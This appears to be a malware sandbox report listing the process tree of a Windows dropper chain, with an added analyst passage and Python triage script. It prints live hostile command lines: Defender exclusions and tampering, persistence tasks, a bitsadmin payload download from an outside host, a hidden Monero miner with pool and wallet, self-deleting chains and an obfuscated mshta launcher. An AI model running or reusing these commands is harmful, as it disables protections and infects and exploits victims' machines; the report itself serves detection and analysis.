C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYUSnSWDi" /SC once /ST 07:40:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYUSnSWDi"11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYUSnSWDi"11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 21:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\ZVZTVMi.exe\" uG /site_id 668658 /S" /V1 /F11⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
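The Install.exe /S /site_id "668658" stage above tampers with Defender in three moves, each launched through forfiles (with /m naming a single System32 file the /c command runs exactly once, so forfiles is only a proxy that puts cmd, powershell and WMIC under an unexpected parent): WMIC calls MSFT_MpPreference.Add with ThreatIDDefaultAction_Actions=6 for four threat IDs (6 is the Allow action in that provider's enumeration; what IDs 2147735503, 2147737010, 2147737007 and 2147737394 name is not on this page), REG ADD writes an "exe" extension exclusion and SpyNetReporting=0 under the Policies hive in both the 32- and 64-bit registry views, and a throwaway task gYUSnSWDi is created, run and deleted whose -EncodedCommand decodes (base64 over UTF-16LE) to "start-process -WindowStyle Hidden gpupdate.exe /force", which forces the policy keys just written to take effect. A second task, bvmcjEjDUxHOOxIZsK, then runs ZVZTVMi.exe as SYSTEM at 21:37:00. The Python below is an added example, not code from the report: a small command-line triage that tags these behaviours, decodes the task's payload and parses the task definition, run over lines copied from this tree plus the taskkill/timeout/del self-deletion chain that several droppers on this page use (eBqlYF_PlHp_DgWOTWFkdGSM.exe, j33PZfVi2SJxBkQ8QMNJtRtd.exe, Firstoffer.exe). Tag names and the sample list are mine; the MP_ACTIONS table is the provider's documented enumeration.

```python
import base64
import re

# ThreatIDDefaultAction_Actions values understood by the MSFT_MpPreference provider.
MP_ACTIONS = {1: "Clean", 2: "Quarantine", 3: "Remove", 6: "Allow",
              8: "UserDefined", 9: "NoAction", 10: "Block"}

# Command lines copied from the tree above (one process each); the last one is a
# benign-looking control case that must produce no tags.
PROC_LINES = [
    r'forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32',
    r'schtasks /CREATE /TN "gYUSnSWDi" /SC once /ST 07:40:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 21:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\ZVZTVMi.exe\" uG /site_id 668658 /S" /V1 /F',
    r'"C:\Windows\System32\cmd.exe" /c taskkill /im eBqlYF_PlHp_DgWOTWFkdGSM.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\eBqlYF_PlHp_DgWOTWFkdGSM.exe" & del C:\ProgramData\*.dll & exit',
    r'taskkill /F /PID 6940',
]


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE, not over ASCII."""
    return base64.b64decode(b64).decode("utf-16-le")


def parse_schtasks(cmdline: str) -> dict:
    """Pull the fields that matter for persistence triage out of a schtasks /CREATE line."""
    def opt(flag):
        # A value is either a double-quoted string (with \" escapes allowed) or one bare token.
        m = re.search(r'/%s\s+("(?:\\"|[^"])*"|\S+)' % flag, cmdline, re.IGNORECASE)
        return m.group(1).strip('"') if m else None
    return {"name": opt("TN"), "run_as": opt("RU"), "schedule": opt("SC"), "action": opt("TR")}


def triage(cmdline: str) -> dict:
    """Tag one process-creation command line; details carry decoded values for the analyst."""
    tags, details = [], {}
    low = cmdline.lower()

    if "msft_mppreference" in low:
        act = re.search(r"ThreatIDDefaultAction_Actions=(\d+)", cmdline, re.IGNORECASE)
        ids = re.findall(r"ThreatIDDefaultAction_Ids=(\d+)", cmdline, re.IGNORECASE)
        action = MP_ACTIONS.get(int(act.group(1)), "Unknown") if act else "Unknown"
        details["threat_action"] = {"ids": ids, "action": action}
        tags.append("defender.threat_action_override")
        if action in ("Allow", "NoAction"):
            tags.append("defender.threat_allowlisted")

    if re.search(r"\breg\s+add\b", low) and "windows defender" in low:
        tags.append("defender.policy_key_write")
        if "\\exclusions\\" in low:
            tags.append("defender.policy_exclusion")
        if "spynetreporting" in low and re.search(r"/d\s+0\b", low):
            tags.append("defender.cloud_reporting_disabled")

    if low.lstrip().startswith("forfiles") and " /c " in low:
        tags.append("lolbin.forfiles_proxy")

    if low.lstrip().startswith("schtasks") and "/create" in low:
        task = parse_schtasks(cmdline)
        details["task"] = task
        tags.append("persistence.schtask_create")
        if (task["run_as"] or "").upper() == "SYSTEM":
            tags.append("persistence.schtask_system")
        enc = re.search(r"-EncodedCommand\s+([A-Za-z0-9+/=]+)", task["action"] or "", re.IGNORECASE)
        if enc:
            decoded = decode_encoded_command(enc.group(1))
            details["decoded_command"] = decoded
            tags.append("powershell.encoded_command")
            if "gpupdate" in decoded.lower():
                tags.append("defender.policy_refresh")

    if "taskkill" in low and re.search(r"\b(del|erase)\b", low):
        tags.append("antiforensics.self_delete_chain")
        if re.search(r"\b(timeout|choice|ping)\b", low):
            tags.append("antiforensics.delayed")
        if "programdata\\*.dll" in low:
            tags.append("antiforensics.wipes_programdata_dlls")

    return {"cmdline": cmdline, "tags": tags, "details": details}


if __name__ == "__main__":
    for line in PROC_LINES:
        r = triage(line)
        print(r["tags"], r["details"])
```

Any of these tags on a non-admin workstation is worth an alert on its own; the combination seen here (Allow overrides, policy exclusion, cloud reporting off, hidden gpupdate) is the whole Defender-neutering sequence, and the SYSTEM task is where to look for what runs next.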
C:\Users\Admin\Documents\OtZ3Bgr_O8lNYovkhfW9MgZl.exe"C:\Users\Admin\Documents\OtZ3Bgr_O8lNYovkhfW9MgZl.exe" silent8⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\Documents\IX1zGxX9efDhwsZ12BGQ_ajS.exe"C:\Users\Admin\Documents\IX1zGxX9efDhwsZ12BGQ_ajS.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9NDEN.tmp\IX1zGxX9efDhwsZ12BGQ_ajS.tmp"C:\Users\Admin\AppData\Local\Temp\is-9NDEN.tmp\IX1zGxX9efDhwsZ12BGQ_ajS.tmp" /SL5="$40618,506127,422400,C:\Users\Admin\Documents\IX1zGxX9efDhwsZ12BGQ_ajS.exe"9⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\is-BQNVG.tmp\Sharefolder.exe"C:\Users\Admin\AppData\Local\Temp\is-BQNVG.tmp\Sharefolder.exe" /S /UID=270910⤵
-
C:\Users\Admin\AppData\Local\Temp\YNYEXAJHFW\foldershare.exe"C:\Users\Admin\AppData\Local\Temp\YNYEXAJHFW\foldershare.exe" /VERYSILENT11⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\AppData\Local\Temp\84-e69be-f3b-24fa7-edbc6f078014c\Qoshaemejyjy.exe"C:\Users\Admin\AppData\Local\Temp\84-e69be-f3b-24fa7-edbc6f078014c\Qoshaemejyjy.exe"11⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\57-db5e6-865-fc28e-e1140a38d9389\Waebaenaehoty.exe"C:\Users\Admin\AppData\Local\Temp\57-db5e6-865-fc28e-e1140a38d9389\Waebaenaehoty.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dr0z1sou.qsq\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\dr0z1sou.qsq\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\dr0z1sou.qsq\GcleanerEU.exe /eufive13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5qvdmsvd.4x5\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\5qvdmsvd.4x5\installer.exeC:\Users\Admin\AppData\Local\Temp\5qvdmsvd.4x5\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\otoeqaih.vus\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\otoeqaih.vus\any.exeC:\Users\Admin\AppData\Local\Temp\otoeqaih.vus\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pqueirte.b1e\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\pqueirte.b1e\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\pqueirte.b1e\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\pqueirte.b1e\gcleaner.exe" & exit14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f15⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gbzxo0dp.tfy\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\gbzxo0dp.tfy\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\gbzxo0dp.tfy\autosubplayer.exe /S13⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -piKZNpnxj7ps2Vba -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZy3DKDGFkSCqK3x -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll" OnpGSK15⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh2AED.tmp\tempfile.ps1"14⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Users\Admin\Documents\cOSvj6_TfVEcVvnn5pGOY1Gg.exe"C:\Users\Admin\Documents\cOSvj6_TfVEcVvnn5pGOY1Gg.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\cOSvj6_TfVEcVvnn5pGOY1Gg.exe"C:\Users\Admin\Documents\cOSvj6_TfVEcVvnn5pGOY1Gg.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 9367⤵
- Program crash
-
C:\Users\Admin\Documents\p6qIMjwiMtneHlcgDQwJordB.exe"C:\Users\Admin\Documents\p6qIMjwiMtneHlcgDQwJordB.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8108 -s 2447⤵
- Program crash
-
C:\Users\Admin\Documents\ccXimH7DCVZOVguRTTQtED4r.exe"C:\Users\Admin\Documents\ccXimH7DCVZOVguRTTQtED4r.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\5123157.scr"C:\Users\Admin\AppData\Roaming\5123157.scr" /S7⤵
-
C:\Users\Admin\AppData\Roaming\1477080.scr"C:\Users\Admin\AppData\Roaming\1477080.scr" /S7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\6642635.scr"C:\Users\Admin\AppData\Roaming\6642635.scr" /S7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6729582.scr"C:\Users\Admin\AppData\Roaming\6729582.scr" /S7⤵
-
C:\Users\Admin\Documents\3wIhaEv7Ltp2XU8bgsQTib5q.exe"C:\Users\Admin\Documents\3wIhaEv7Ltp2XU8bgsQTib5q.exe"6⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\Z2ECp8JodQbWGsvkzsmoyMv5.exe"C:\Users\Admin\Documents\Z2ECp8JodQbWGsvkzsmoyMv5.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\Z58YFjny287dHiWTdWlvNYF0.exe"C:\Users\Admin\Documents\Z58YFjny287dHiWTdWlvNYF0.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- C:\Users\Admin\Documents\Rz3nzm_MIHXb0zRRpyo8WLSo.exe (depth 6)
  Command line: "C:\Users\Admin\Documents\Rz3nzm_MIHXb0zRRpyo8WLSo.exe"
- C:\Program Files (x86)\Company\NewProduct\Installer.exe (depth 7)
  Command line: "C:\Program Files (x86)\Company\NewProduct\Installer.exe"
  - Adds Run key to start application
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe (depth 8)
  Command line: C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe (depth 9)
  Command line: "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe (depth 9)
  Command line: "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe (depth 9)
  Command line: "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 9)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Helper.exe"
- C:\Program Files (x86)\Company\NewProduct\cm3.exe (depth 7)
  Command line: "C:\Program Files (x86)\Company\NewProduct\cm3.exe"
- C:\Users\Admin\Documents\OITjDfOmO1EwVIRrcSQjebGx.exe (depth 6)
  Command line: "C:\Users\Admin\Documents\OITjDfOmO1EwVIRrcSQjebGx.exe"
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
- C:\Users\Admin\Documents\_8q1PSDQqSKVkw8kGBqzosdZ.exe (depth 6)
  Command line: "C:\Users\Admin\Documents\_8q1PSDQqSKVkw8kGBqzosdZ.exe"
- C:\Windows\SysWOW64\cmd.exe (depth 4)
  Command line: C:\Windows\system32\cmd.exe /c Wed154a69e494d5e99ca.exe
- C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed154a69e494d5e99ca.exe (depth 5)
  Command line: Wed154a69e494d5e99ca.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe (depth 6)
  Command line: "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
  - Executes dropped EXE
- C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe (depth 7)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
  - Executes dropped EXE
- C:\Windows\System32\cmd.exe (depth 8)
  Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
- C:\Windows\system32\schtasks.exe (depth 9)
  Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
  - Creates scheduled task(s)
- C:\Users\Admin\AppData\Roaming\services64.exe (depth 8)
  Command line: "C:\Users\Admin\AppData\Roaming\services64.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
- C:\Windows\System32\cmd.exe (depth 9)
  Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
- C:\Windows\system32\schtasks.exe (depth 10)
  Command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
  - Creates scheduled task(s)
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe (depth 9)
  Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
  - Executes dropped EXE
- C:\Windows\explorer.exe (depth 9)
  Command line: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
- C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe (depth 7)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
- C:\Windows\SysWOW64\cmd.exe (depth 8)
  Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im Firstoffer.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe" & del C:\ProgramData\*.dll & exit
- C:\Windows\SysWOW64\taskkill.exe (depth 9)
  Command line: taskkill /im Firstoffer.exe /f
  - Kills process with taskkill
- C:\Windows\SysWOW64\timeout.exe (depth 9)
  Command line: timeout /t 6
  - Delays execution with timeout.exe
- C:\Users\Admin\AppData\Local\Temp\inst3.exe (depth 7)
  Command line: "C:\Users\Admin\AppData\Local\Temp\inst3.exe"
- C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe (depth 7)
  Command line: "C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe"
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\WerFault.exe (depth 8)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 336
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\WerFault.exe (depth 8)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 484
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 8)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 500
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 8)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 464
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 8)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 556
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 8)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 540
  - Program crash
- C:\Windows\SysWOW64\WerFault.exe (depth 8)
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 560
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
- C:\Users\Admin\AppData\Local\Temp\Install.EXE (depth 7)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Install.EXE"
  - Executes dropped EXE
  - Adds Run key to start application
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe (depth 8)
  Command line: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
  - Executes dropped EXE
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 9)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe (depth 9)
  Command line: "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe"
  - Executes dropped EXE
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE (depth 8)
  Command line: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE
  - Executes dropped EXE
- C:\Windows\SysWOW64\cmd.exe (depth 9)
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS900C.tmp\Install.cmd" "
  - Checks computer location settings
- C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe (depth 7)
  Command line: "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
- C:\Users\Admin\AppData\Roaming\6571754.scr (depth 8)
  Command line: "C:\Users\Admin\AppData\Roaming\6571754.scr" /S
  - Executes dropped EXE
  - Suspicious behavior: SetClipboardViewer
- C:\Users\Admin\AppData\Roaming\5795491.scr (depth 8)
  Command line: "C:\Users\Admin\AppData\Roaming\5795491.scr" /S
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
- C:\Users\Admin\AppData\Roaming\2610751.scr (depth 8)
  Command line: "C:\Users\Admin\AppData\Roaming\2610751.scr" /S
  - Executes dropped EXE
- C:\Users\Admin\AppData\Roaming\2175204.scr (depth 8)
  Command line: "C:\Users\Admin\AppData\Roaming\2175204.scr" /S
- C:\Users\Admin\AppData\Local\Temp\setup.exe (depth 7)
  Command line: "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\cmd.exe (depth 8)
  Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
- C:\Windows\SysWOW64\taskkill.exe (depth 9)
  Command line: taskkill /im "setup.exe" /f
  - Kills process with taskkill
- C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe (depth 7)
  Command line: "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
  - Executes dropped EXE
- C:\Windows\SysWOW64\mshta.exe (depth 8)
  Command line: "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
- C:\Windows\SysWOW64\cmd.exe (depth 9)
